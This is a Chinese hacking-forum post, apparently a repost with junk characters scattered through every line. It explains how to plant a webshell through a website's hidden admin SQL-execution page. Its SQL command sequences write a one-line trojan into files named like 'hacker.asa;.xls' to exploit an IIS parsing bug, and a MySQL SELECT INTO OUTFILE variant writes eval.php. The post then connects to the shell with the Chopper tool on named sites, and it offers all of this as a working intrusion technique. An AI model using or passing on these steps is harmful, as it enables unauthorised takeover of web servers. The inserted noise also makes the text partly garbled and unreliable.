好不容易进了后台,发现啥上传啊。备份啊多木有。
/ `; R# P# ?. N. Wwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的0 a% V& ]" E7 n
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,, y- j* b. m2 x5 j9 \% J
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:. p0 l$ R* _$ A0 }
1.create table cmd (a varchar(50))
2 j+ v5 K" s3 x2.insert into cmd (a) values (‘‘)5 S7 b4 h* Z4 ]! v
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd9 A* U8 a2 b' j' u
(把表cmd的内容导出为物理路径的一个EXCEL文件)
( x- X' C9 ]2 s1 Z, |! u) i4.drop table cmd3 F, s! u- n6 B
利用IIS的BUG成功拿到了WEBSHELL。3 V9 A( L) X" @2 i2 }$ `) u2 S
' s6 _7 P; |- h1 ?1 a直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话; a2 ]0 ?0 l" I9 `9 ]- ?, @
# E. u6 P+ N% n+ B SQL语句意思解释:0 b0 K3 J: R, @
第一句7 v, u0 O+ C8 K% p. W" C
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50' m8 O* \- @# O9 J3 a
/ s7 A, F: T6 j# _$ m8 m6 u+ p 第二句9 I8 v5 w) r/ K$ \7 |4 V0 [1 D4 n
在表cmd的a字段插入一句话木马: O( y; F" k5 h7 i2 a
第三句! a3 z0 t6 y- p& q9 c; \
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
5 ^- c3 |; T7 j T# y3 m' M0 s) m$ ^# R1 B I7 n3 v
第四句
- N8 Z) O- ~# P6 M/ Y. ~) V* V 删除建立的cmd表
7 w, ]" U- q/ T) J+ w/ v2 w- c) Q/ Y# t; f
以下内容为测试:
3 o6 F6 [& j4 v- w Access利用后台SQL执行命令功能导出WebShell:0 }' I. Q+ x4 q, L( m9 o3 o. k5 F
这个更简单:( _2 Y2 U# e. A- s' i+ A
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]5 }3 f8 a* t6 q, {" [8 k
或者( ]2 {" W& y! Y& E }0 F, D% T
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
0 G- A' X* I) t% [ ^ K+ P: E
8 n( ~3 K5 n1 g* \/ B( {% [ 后台有执行SQL语句功能(vote为已知表段)1 N7 g7 Q* e) M0 y- K& y( T$ U
希望对大家有所帮助拿shell的又一个思路5 J( h. O7 g' ]2 Q" J
|